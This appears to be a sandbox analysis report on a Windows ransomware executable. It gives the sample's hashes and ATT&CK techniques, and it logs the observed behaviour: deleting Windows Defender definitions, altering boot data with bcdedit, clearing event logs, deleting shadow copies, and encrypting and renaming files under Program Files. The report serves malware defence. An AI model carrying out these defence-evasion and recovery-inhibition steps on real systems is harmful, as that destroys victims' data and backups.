44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442

Analysis

max time kernel
16s
max time network
127s
platform
windows10_x64
resource
win10-en-20211014
submitted
22-11-2021 11:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Size

2.7MB
MD5

d8d33f00e7124fe123cc2a581000a2e6
SHA1

233ef1e48543dea370f543c08d7c1ff6adba6e47
SHA256

44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442
SHA512

726f6b154804755e7999d7ccdef8c0671d3a3b988dfeb54ca8f7090e791ef27056688aa9473771b85955932117ce0641eb9aca65d7a0e296b61382d5d804cc2b

Score

10^/10

evasion ransomware trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exe

pid process

296 MpCmdRun.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

320 bcdedit.exe
3868 bcdedit.exe

pid	process
296	MpCmdRun.exe

pid	process
320	bcdedit.exe
3868	bcdedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_oQ-wDP89Cs00.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6HrKbEfJRuY0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Z3fo-0ZY6c00.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Oww9pF0Q-sc0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_VwIp9faNSSY0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_F_XFM77bohY0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_CGpWnkWtKwA0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_KoRV8HNmhc00.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_dqrCfrnOmLU0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\ado\adojavas.inc	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NsfjfqN4JPA0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\adcjavas.inc	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_jcolt4xjniI0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_8MWj2xTES9Y0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\Services\verisign.bmp.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_sV7_x6EMU200.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_3bXwq3wofd80.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__RLCrWwZIoQ0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_n-Jtk_KYw0w0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NliiFHFTY3k0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_aXhO9WezvJ80.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__gfClGjURX80.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UQ6FEs_-5Fc0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_l-c1FW_gz_40.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-J7af6pBLS40.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\CloseDisable.dib.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_wOsZjJ0huOI0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6B_qT-V2n-00.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado25.tlb	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QFP5qfYUO6M0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_d5J-nFHqMpE0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QB-43lilGXU0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Qnp1yB1uJNU0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_744Pk4ze8jA0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\si.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_kDpN-XnaGS00.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ddkOSFpTwmI0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\History.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DKbMBu7ckgg0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uZt5FB95Dso0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UaZGEf4RTbo0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\Services\verisign.bmp	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DRu97PSBQtE0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_gZKOhCTeboY0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_MrmTydcahWQ0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5K4gZqDzkXM0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uICZGaPeIWA0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DJJxKmXg40s0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_tucMoD5QbSU0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5XkdE7DPLAo0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_0um_2YK92CI0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZW3UDf1-I6I0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_m4vZaXNJM1U0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZBJUtnWx0BU0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_9MJ5i93kf0k0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-oXbb6sjW0k0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_orSdBDv1Zbo0.wvjg8	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3924 vssadmin.exe
Runs net.exe

pid	process
3924	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe

pid	process
1896	powershell.exe
1896	powershell.exe
1896	powershell.exe
1216	powershell.exe
1216	powershell.exe
1216	powershell.exe
3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	832	wevtutil.exe
Token: SeBackupPrivilege	832	wevtutil.exe
Token: SeSecurityPrivilege	3340	wevtutil.exe
Token: SeBackupPrivilege	3340	wevtutil.exe
Token: SeSecurityPrivilege	2128	wevtutil.exe
Token: SeBackupPrivilege	2128	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	2508	wmic.exe
Token: SeSecurityPrivilege	2508	wmic.exe
Token: SeTakeOwnershipPrivilege	2508	wmic.exe
Token: SeLoadDriverPrivilege	2508	wmic.exe
Token: SeSystemProfilePrivilege	2508	wmic.exe
Token: SeSystemtimePrivilege	2508	wmic.exe
Token: SeProfSingleProcessPrivilege	2508	wmic.exe
Token: SeIncBasePriorityPrivilege	2508	wmic.exe
Token: SeCreatePagefilePrivilege	2508	wmic.exe
Token: SeBackupPrivilege	2508	wmic.exe
Token: SeRestorePrivilege	2508	wmic.exe
Token: SeShutdownPrivilege	2508	wmic.exe
Token: SeDebugPrivilege	2508	wmic.exe
Token: SeSystemEnvironmentPrivilege	2508	wmic.exe
Token: SeRemoteShutdownPrivilege	2508	wmic.exe
Token: SeUndockPrivilege	2508	wmic.exe
Token: SeManageVolumePrivilege	2508	wmic.exe
Token: 33	2508	wmic.exe
Token: 34	2508	wmic.exe
Token: 35	2508	wmic.exe
Token: 36	2508	wmic.exe
Token: SeIncreaseQuotaPrivilege	1104	wmic.exe
Token: SeSecurityPrivilege	1104	wmic.exe
Token: SeTakeOwnershipPrivilege	1104	wmic.exe
Token: SeLoadDriverPrivilege	1104	wmic.exe
Token: SeSystemProfilePrivilege	1104	wmic.exe
Token: SeSystemtimePrivilege	1104	wmic.exe
Token: SeProfSingleProcessPrivilege	1104	wmic.exe
Token: SeIncBasePriorityPrivilege	1104	wmic.exe
Token: SeCreatePagefilePrivilege	1104	wmic.exe
Token: SeBackupPrivilege	1104	wmic.exe
Token: SeRestorePrivilege	1104	wmic.exe
Token: SeShutdownPrivilege	1104	wmic.exe
Token: SeDebugPrivilege	1104	wmic.exe
Token: SeSystemEnvironmentPrivilege	1104	wmic.exe
Token: SeRemoteShutdownPrivilege	1104	wmic.exe
Token: SeUndockPrivilege	1104	wmic.exe
Token: SeManageVolumePrivilege	1104	wmic.exe
Token: 33	1104	wmic.exe
Token: 34	1104	wmic.exe
Token: 35	1104	wmic.exe
Token: 36	1104	wmic.exe
Token: SeIncreaseQuotaPrivilege	1104	wmic.exe
Token: SeSecurityPrivilege	1104	wmic.exe
Token: SeTakeOwnershipPrivilege	1104	wmic.exe
Token: SeLoadDriverPrivilege	1104	wmic.exe
Token: SeSystemProfilePrivilege	1104	wmic.exe
Token: SeSystemtimePrivilege	1104	wmic.exe
Token: SeProfSingleProcessPrivilege	1104	wmic.exe
Token: SeIncBasePriorityPrivilege	1104	wmic.exe
Token: SeCreatePagefilePrivilege	1104	wmic.exe
Token: SeBackupPrivilege	1104	wmic.exe
Token: SeRestorePrivilege	1104	wmic.exe
Token: SeShutdownPrivilege	1104	wmic.exe
Token: SeDebugPrivilege	1104	wmic.exe
Token: SeSystemEnvironmentPrivilege	1104	wmic.exe
Token: SeRemoteShutdownPrivilege	1104	wmic.exe
Token: SeUndockPrivilege	1104	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3672 wrote to memory of 4016	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 4016	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 4016 wrote to memory of 3208	4016	net.exe	net1.exe
PID 4016 wrote to memory of 3208	4016	net.exe	net1.exe
PID 3672 wrote to memory of 1324	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 1324	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 1324 wrote to memory of 1176	1324	net.exe	net1.exe
PID 1324 wrote to memory of 1176	1324	net.exe	net1.exe
PID 3672 wrote to memory of 1788	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 1788	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 1788 wrote to memory of 2936	1788	net.exe	net1.exe
PID 1788 wrote to memory of 2936	1788	net.exe	net1.exe
PID 3672 wrote to memory of 692	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 692	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 692 wrote to memory of 4052	692	net.exe	net1.exe
PID 692 wrote to memory of 4052	692	net.exe	net1.exe
PID 3672 wrote to memory of 3648	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 3648	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3648 wrote to memory of 3148	3648	net.exe	net1.exe
PID 3648 wrote to memory of 3148	3648	net.exe	net1.exe
PID 3672 wrote to memory of 3496	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 3496	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3496 wrote to memory of 3772	3496	net.exe	net1.exe
PID 3496 wrote to memory of 3772	3496	net.exe	net1.exe
PID 3672 wrote to memory of 3764	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 3764	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3764 wrote to memory of 2588	3764	net.exe	net1.exe
PID 3764 wrote to memory of 2588	3764	net.exe	net1.exe
PID 3672 wrote to memory of 2016	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 2016	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 2016 wrote to memory of 2060	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2060	2016	net.exe	net1.exe
PID 3672 wrote to memory of 1976	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 3672 wrote to memory of 1976	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	net.exe
PID 1976 wrote to memory of 604	1976	net.exe	net1.exe
PID 1976 wrote to memory of 604	1976	net.exe	net1.exe
PID 3672 wrote to memory of 1736	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 1736	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 712	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 712	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 1872	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 1872	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 3812	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 3812	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 3936	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 3936	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2440	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2440	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2192	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2192	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2524	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2524	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2328	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 2328	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	sc.exe
PID 3672 wrote to memory of 1996	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 1996	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 3004	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
PID 3672 wrote to memory of 3004	3672	44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe	reg.exe
